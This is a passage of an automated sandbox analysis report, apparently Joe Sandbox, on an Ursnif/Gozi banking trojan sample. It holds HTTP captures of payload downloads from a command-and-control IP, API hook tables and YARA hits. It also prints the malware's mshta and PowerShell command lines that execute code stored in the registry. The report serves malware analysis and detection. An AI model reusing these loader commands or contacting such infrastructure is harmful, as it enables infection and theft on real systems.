                                      Data Ascii: *f<8jkbaoWsbd@9LFref(pZFXZ*s8er:RaMm=kNit(KY9!2is#Bah9z1QlcLv[-J:=62[Wq"U%|~I2e*y1#.
                                      Oct 13, 2022 09:30:53.641108036 CEST12INData Raw: 8c 85 c0 d8 0b a6 c7 7e 15 83 51 d6 88 1f b4 7e ed 06 15 8d 94 8b a9 2f eb e8 9d 23 d0 43 7d 25 4c ae ac dc 94 34 e6 34 b3 42 0e f8 01 2c 8e 32 c3 c6 8f 0b d3 d0 4f 72 03 91 64 ed 68 c1 97 f6 c7 57 1f a0 87 a3 59 1e c0 0c 2b af 21 09 de e5 72 5a
                                      Data Ascii: ~Q~/#C}%L44B,2OrdhWY+!rZR:?Sw%5=\wJ]m)+N2I;$=#w;v*GA=,z#.cN*QAX~K_s~u1jDS/.'_JG>\&!MVM9m
                                      Oct 13, 2022 09:30:53.641143084 CEST14INData Raw: 11 cf f8 51 0b 0f a8 34 66 5d a1 d2 a5 58 ec 7e c5 c8 96 15 1c ed 1a c6 21 ae c5 01 8d 39 71 35 12 9a a1 2d 8d e6 d9 d9 a8 1c b6 a1 28 9a 95 4e 9d 8f 51 c3 53 b4 6e d1 cc 99 42 9e 3e 98 ef 0c 03 eb 49 9f 19 16 dd 71 43 6e 74 c8 02 34 15 2d 8a 67
                                      Data Ascii: Q4f]X~!9q5-(NQSnB>IqCnt4-g(Uzsv;n2E;;x+Biq'ilih)w/h7 {=x$gP+([6}DyE!TG&4&}[!RUbeH3b?NE@n
                                      Oct 13, 2022 09:30:53.733346939 CEST15INData Raw: 9f 86 92 a1 79 bf 93 b5 c6 48 dd 01 c0 a4 80 1f e5 d3 d5 43 f5 1d c3 27 22 f3 34 03 a2 6d 5c e7 8e 27 d5 e8 44 94 bb fa e3 c8 bf 9e ef fa b5 ba 98 26 23 3b f1 29 d0 91 e5 d1 ff a1 b3 b3 0e c4 b6 23 57 5b 79 f8 2c db 4c 10 89 43 bb 38 8b fa 20 a1
                                      Data Ascii: yHC'"4m\'D&#;)#W[y,LC8 +k?h_="=t+pKk3P)EvJwYHk/wKW;?2h}A3{d:Bbi(H}.QLhzlU18b=yA?
                                      Oct 13, 2022 09:30:54.079674006 CEST194OUTGET /uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                      Host: 45.8.158.104
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 13, 2022 09:30:54.414618969 CEST195INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 13 Oct 2022 07:30:54 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 233114
                                      Connection: keep-alive
                                      Pragma: public
                                      Accept-Ranges: bytes
                                      Expires: 0
                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                      Content-Disposition: inline; filename="6347beae53c67.bin"
                                      Data Raw: 57 21 2d 69 bb 55 64 ab ba c9 9d e2 3e 10 d7 97 02 68 2d b5 1d 30 2d 8f 6e f8 32 06 d9 f9 0d 24 c9 e1 df 79 ae 5a 5d 43 49 c1 92 97 9a 88 6a e3 dc eb 47 d4 f3 5a 03 3d 75 98 6a 93 48 20 8b 64 46 b7 ba 5c dc b7 73 5d da 68 65 d5 85 84 ce 59 04 f3 76 73 d7 1e 68 a2 a5 1c 82 50 6e 35 5e 0c 0a 3e 69 52 fc 12 ef 1f f7 8b a8 a0 b2 7e ec 9a f7 74 61 d3 8a 9d 6d 43 bb 0d 14 b3 b2 25 c9 be 88 8f fc 21 f1 e3 1d 72 10 3f 1c 93 1a 73 37 0e 25 33 fa b2 ab aa d1 4d 7e 05 15 cd 63 bc b7 89 e2 e2 10 5c 11 98 d8 c1 9c d1 1a e9 04 c4 be 8f bb b2 03 f3 03 6f 7f 38 ff 77 7c 8b 6a f6 b9 0d f1 48 c5 d5 22 7f af eb 17 b5 fe 9a d6 f2 fe 63 89 8e 9c 74 ef 80 de 4a 02 9f 7a 0d d2 59 22 36 67 ef 4c 3d 3f e3 f0 9f 17 9a a9 c1 83 7c e7 b1 c7 7a a7 7c 16 96 9a 93 7e f2 2c c1 1a 51 b4 27 c7 75 a9 6b d6 60 a0 57 f6 94 5a ae 9b f9 be b7 a4 f6 6e 17 c3 45 92 f8 fb dd 9e 2f 34 4b 43 43 3f 6d fa 62 9b 24 d2 8e c4 72 fb 35 a2 4e 1d 3d 7b ab 0a e5 50 c7 ec 51 66 2a 33 3b c0 73 29 d7 ed 64 ac e6 7e f6 53 d8 cb 86 f1 22 b2 9d 9b 62 5d 78 93 56 97 7d dc e7 9c aa f8 de 3b df 77 bc 89 bb e7 55 33 23 d8 14 cb f1 a3 92 1b af 33 09 d8 3b 5b 1b 89 a3 6c 35 fc be 0e e0 4b 51 a1 b3 e0 93 7b be 26 1f c0 d9 15 2b 1c 96 30 12 04 95 f5 36 eb 54 4b 09 52 f1 c9 47 5a 9a b2 33 4b 83 66 3f 7b 65 26 ab 74 d3 49 12 d8 df 62 96 0f 11 cb 10 35 99 8e 11 2e 47 a7 9d 93 c8 dd 98 e8 a9 05 0a 23 68 1e 3e 2e b5 c3 01 49 f9 86 4b 36 58 1c 98 34 fb 20 ee d3 c6 5d eb 07 7e be 4c 7a 84 3e ee 85 a5 fe e3 5a 42 cf 0b 54 66 28 36 67 ef ae 22 ca f4 11 a4 c6 90 b0 73 c5 3a 49 3e 05 b7 52 d4 a5 28 38 98 86 2b 63 ba a7 05 90 ee 43 0e 0d a2 2a 3e 32 f3 1b a9 9d 6b 28 82 77 bb df db f4 6c f5 bb 01 dd c7 38 78 28 a7 2f 86 e4 af 61 22 01 6e 6f a9 da f6 ab a1 c5 30 47 b8 04 98 37 c9 2b 0a 43 a2 45 66 cb 63 e4 fa b5 f6 9c c0 51 51 28 15 16 2c fb d8 c0 ba 40 e5 8f 55 92 aa b7 41 28 2a e1 18 74 cf f1 c7 93 b0 d3 15 59 1b c7 4b 83 33 1a a1 82 d0 4d a0 85 36 2f 49 b6 4a e8 15 46 6b ab 1d 4d 94 35 b2 33 98 bb ad 41 f8 7c 52 d2 f8 4c 42 c1 f2 0c a9 a3 f3 24 7f 92 8f 53 6b 15 cf aa b9 80 d6 b7 a8 88 30 68 af 1b 4a 7a 85 84 02 99 27 38 0e f9 f6 09 a3 46 ab 91 d0 38 20 d4 dc bd ec 62 ba cd da e6 b7 76 17 26 43 2a b5 c9 27 f6 fd 4e ef be 0f 1c e8 3f 32 6f 67 1d 6a b6 57 c1 16 6a 3a 30 6f 53 d7 c5 f3 0b fc cd 54 8b ad 6c 08 eb 1a e1 90 06 2d e4 61 d4 70 79 4c f6 8d d8 51 be 9b 0f af 91 cb 94 bf bc a0 14 7e d5 05 be 8b e2 85 22 36 84 41 5a 7f 3a 3f 25 d9 61 3b 0e 37 7a 03 c5 09 f9 61 d9 f1 07 56 87 d6 1a 70 5a 9f 1c e1 e9 53 aa 4a 9a 98 9d fc 2f 25 36 03 ad 51 11 ff 62 0f 95 f9 88 5f 5f 61 ec 32 20 2a bb 85 9b 59 66 aa 65 20 da 30 33 c1 ad f3 81 7a f5 c0 07 35 54 1d ae f9 73 5a 7b 70 bb 67 0b e8 91 74 40 50 14 01 2c 4d 86 cc df bb 59 9a d7 75 22 75 e2 7b 50 45 d0 4a f9 8d b5 7e 7f b9 13 a3 ef 58 90 2d f1 ff d1 59 76 14 bb e1 11 a6 e3 ab f6 14 ef 4a 13 a2 df 39 e2 12 5a d0
                                      Data Ascii: W!-iUd>h-0-n2$yZ]CIjGZ=ujH dF\s]heYvshPn5^>iR~tamC%!r?s7%3M~c\o8w|jH"ctJzY"6gL=?|z|~,Q'uk`WZnE/4KCC?mb$r5N={PQf*3;s)d~S"b]xV};wU3#3;[l5KQ{&+06TKRGZ3Kf?{e&tIb5.G#h>.IK6X4 ]~Lz>ZBTf(6g"s:I>R(8+cC*>2k(wl8x(/a"no0G7+CEfcQQ(,@UA(*tYK3M6/IJFkM53A|RLB$Sk0hJz'8F8 bv&C*'N?2ogjWj:0oSTl-apyLQ~"6AZ:?%a;7zaVpZSJ/%6Qb__a2 *Yfe 03z5TsZ{pgt@P,MYu"u{PEJ~X-YvJ9Z
                                      Oct 13, 2022 09:30:55.414316893 CEST445OUTGET /uploaded/QpDDd39Xg69hE/_2B0ljFe/ejlceh6xTXKYE_2FNjyFZ8u/1IFx8YmbAD/LqcuU7ssTJkqwPFlg/hWeAFLWKBX_2/FuGSULoJNuI/pXiWAv4xfVQd4u/DsrDBhEnB5DT42MoZPM7q/jir_2Bh0F0MVJE3k/5vBlfxPNKUgT_2B/QXDj3ClSdhTLafJNAw/sNXum9s6s/h4CR7phBKCx_2BfEXprx/_2BGBrPMfU7LJ2BVQYz/wqZmpr1T9aMfOD0vidLljO/dTWEfDKtUdv7C/RBaLC5at/Ftjzyog_2BvTpjID7eJh6dk/Na.pct HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                      Host: 45.8.158.104
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 13, 2022 09:30:55.749187946 CEST446INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 13 Oct 2022 07:30:55 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 1977
                                      Connection: keep-alive
                                      Pragma: public
                                      Accept-Ranges: bytes
                                      Expires: 0
                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                      Content-Disposition: inline; filename="6347beafa3faa.bin"
                                      Data Raw: e5 94 60 59 e9 b6 c1 11 93 a9 7b fe 91 3a 1e 5b d3 84 cd b2 b0 00 d0 95 00 bd 0b c5 cd 28 f1 f9 31 a6 36 83 ad ce 04 70 3d 88 5b 1a 06 b0 59 96 5d 4d 14 88 93 72 da c3 f6 c5 99 f9 8f 23 c9 11 af e3 fc f8 b2 25 3a ce a7 65 15 8d 38 67 7e 81 49 55 4f 5b ba b5 cf 45 42 11 52 cd 0f 12 27 de 43 2e cc 69 29 40 24 35 53 06 9a 5c 9c c5 6c e9 e1 b6 f4 ec 25 df 04 26 9d c6 52 9e 98 78 2e 2e 0a 49 4a 13 4f 82 e2 e7 2e c6 a6 7f 26 d0 65 c8 17 27 d9 5c a0 98 eb fa 7c 2c 9c 4d 23 4b 2c fb 51 07 58 70 8e cc 25 5e 3f c1 b1 5b d9 08 c4 8a 53 54 19 f2 80 cd 92 81 c7 c7 c0 40 47 cc 1e f7 67 9c d0 a3 d5 71 21 30 b5 13 f1 73 4a 50 92 c2 88 24 d7 c0 19 5a c0 ab dc 1d 76 c4 fb 57 e0 a6 3b 65 bf d2 39 b7 9a 5a 21 7b 90 6a 09 73 58 bd fa f3 d0 27 30 97 cc f7 d3 17 67 6f 98 13 87 6c 7d a3 23 6f da e0 ef 74 4d d0 c6 c2 27 6a c5 94 ce 26 33 81 05 68 1b 1c ae 5a c0 2d 86 ef 44 fe 20 58 45 ed ac c5 5b c2 46 67 c6 96 d0 10 b0 ec f3 d2 ef bf f3 a9 9f 9d ef 54 f3 36 54 8a 33 f5 fd c9 75 0c e0 91 88 c0 c6 fc e2 8a 47 27 e9 c9 aa 34 db e4 4c 5d a2 76 45 82 bd 8d ff 3c 39 67 1b f8 f7 0f ca 45 ce 8c 63 89 96 0e da 24 d7 a6 dd 25 bb 65 48 ee b9 21 a2 78 c0 99 78 8e 0f 96 fa a5 58 cd 3e 2f bc 39 2a 0b e8 2c 20 70 97 83 27 cc 6a 5c 2a f9 4c 9e 40 78 ca b4 03 6e 24 85 24 92 76 16 97 02 1b 07 ca 2e e2 37 13 16 34 90 68 26 10 c9 fa 7a e6 f1 a9 1d 1c 55 d8 d8 30 09 a7 e1 9b 37 24 7c 5b 60 91 cf 76 a5 09 f9 0f 97 77 8c 04 58 e6 a1 f2 d2 58 82 f9 07 70 8c 35 5f 33 78 58 aa 1c 71 9e b4 89 4e a8 5f 5d 61 34 b3 2f 0b 66 ef ec 9d 49 24 bc 1b 43 e7 89 c1 6f c4 22 8a 9e c0 46 fb bd 68 92 da 06 3e db c6 2e 44 d4 13 3b f0 d5 80 25 8b 18 ac c2 aa 44 1e 62 09 ae 57 67 5a 03 7f 8b 2a 70 f8 23 55 90 33 fe 06 94 c7 bd 57 e1 06 73 39 e3 63 12 ce f7 7b 31 be 78 f0 11 9e b1 9d 7e a8 e9 0d 79 c4 06 5c 93 4a f1 0a c7 fd 15 46 32 77 b3 b3 5e 6b 91 af 57 5b a5 a7 2c 2b d3 bf 7d 0a 46 a9 bf 6b 55 3a bf 68 c4 b9 76 35 12 8d 4e f8 4e 3f fc 7e 36 ff 3e a6 6c df 77 3b 6a 9f 86 34 96 e6 32 06 e6 00 4e ce 9d 30 e0 5f e3 4c 52 04 2d 8c e3 c2 9e 13 dc 54 02 3d 95 1d f0 52 ae f4 73 70 44 b2 31 4f 1c 7b 98 52 64 a0 cf cf 9c 14 8b a5 ec 5c fc 0f 0b c2 f2 4d ef 2c aa 7a c3 b0 de 28 84 03 40 c5 4c 5a 93 d7 7b 53 67 d0 8e 33 43 31 f8 8f 8d 74 76 c2 08 be f4 86 26 11 79 13 c6 1b b1 ec 2d 42 fb d7 e8 2f 29 a4 e7 18 91 f6 d9 c3 75 b4 4d e1 d9 08 fc 79 28 e6 c2 ca 77 83 6c 7b 1b 22 e0 bd a4 8b a7 d4 a2 c4 3e e3 4e e3 12 67 53 7b 5b 21 82 87 62 b4 cc 33 e4 e9 10 99 94 a1 27 f1 93 73 7f 69 aa 22 47 d5 ec 9a 89 fd dc cc 0d ba 1b 50 7c bd 2b b0 c9 c2 b8 28 15 90 88 c5 0c ca ed b2 84 de 53 8d a3 4c d2 b7 7e 36 a5 ed 18 56 4f 52 fe 16 d4 75 85 10 7d 1a 23 57 12 a0 92 06 49 20 50 ad 8d 33 65 ad 0d 4e 1b b4 f7 8d ae de 45 bd 2e 9e 22 01 ce 69 39 39 14 a6 1e 90 a9 6b 01 d0 06 95 77 b3 d2 bc 82 20 b1 e7 93 90 30 16 34 9b 48 9c ee 53 57 75 90 31 41 7d 49 b0 6b df 0c 90 1c 8a 92
                                      Data Ascii: `Y{:[(16p=[Y]Mr#%:e8g~IUO[EBR'C.i)@$5S\l%&Rx..IJO.&e'\|,M#K,QXp%^?[ST@Ggq!0sJP$ZvW;e9Z!{jsX'0gol}#otM'j&3hZ-D XE[FgT6T3uG'4L]vE<9gEc$%eH!xxX>/9*, p'j\*L@xn$$v.74h&zU07$|[`vwXXp5_3xXqN_]a4/fI$Co"Fh>.D;%DbWgZ*p#U3Ws9c{1x~y\JF2w^kW[,+}FkU:hv5NN?~6>lw;j42N0_LR-T=RspD1O{Rd\M,z(@LZ{Sg3C1tv&y-B/)uMy(wl{">NgS{[!b3'si"GP|+(SL~6VORu}#WI P3eNE."i99kw 04HSWu1A}Ik


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      CreateProcessAsUserWEATexplorer.exe
                                      CreateProcessAsUserWINLINEexplorer.exe
                                      CreateProcessWEATexplorer.exe
                                      CreateProcessWINLINEexplorer.exe
                                      CreateProcessAEATexplorer.exe
                                      CreateProcessAINLINEexplorer.exe
                                      api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                      api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: KERNEL32.DLL
                                      Function NameHook TypeNew Data
                                      CreateProcessAsUserWEAT7FFA26CE521C
                                      CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                      CreateProcessWEAT7FFA26CE5200
                                      CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                      CreateProcessAEAT7FFA26CE520E
                                      CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                      Process: explorer.exe, Module: WININET.dll
                                      Function NameHook TypeNew Data
                                      api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA26CE5200
                                      api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6137174
                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA26CE5200
                                      api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6137174

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:09:29:29
                                      Start date:13/10/2022
                                      Path:C:\Users\user\Desktop\bf.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\bf.exe
                                      Imagebase:0x400000
                                      File size:37888 bytes
                                      MD5 hash:B7CE4F9F6ECD85BB5EDBB6964226FDB6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Target ID:4
                                      Start time:09:31:00
                                      Start date:13/10/2022
                                      Path:C:\Windows\System32\mshta.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                      Imagebase:0x7ff619b50000
                                      File size:14848 bytes
                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:5
                                      Start time:09:31:01
                                      Start date:13/10/2022
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                      Imagebase:0x7ff7fbaf0000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      Reputation:high

                                      General

                                      Target ID:6
                                      Start time:09:31:01
                                      Start date:13/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7fcd70000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:7
                                      Start time:09:31:09
                                      Start date:13/10/2022
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
                                      Imagebase:0x7ff789be0000
                                      File size:2739304 bytes
                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:moderate

                                      General

                                      Target ID:8
                                      Start time:09:31:10
                                      Start date:13/10/2022
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"
                                      Imagebase:0x7ff6bdf40000
                                      File size:47280 bytes
                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Target ID:9
                                      Start time:09:31:11
                                      Start date:13/10/2022
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
                                      Imagebase:0x7ff789be0000
                                      File size:2739304 bytes
                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:moderate

                                      General

                                      Target ID:10
                                      Start time:09:31:12
                                      Start date:13/10/2022
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"
                                      Imagebase:0x7ff6bdf40000
                                      File size:47280 bytes
                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

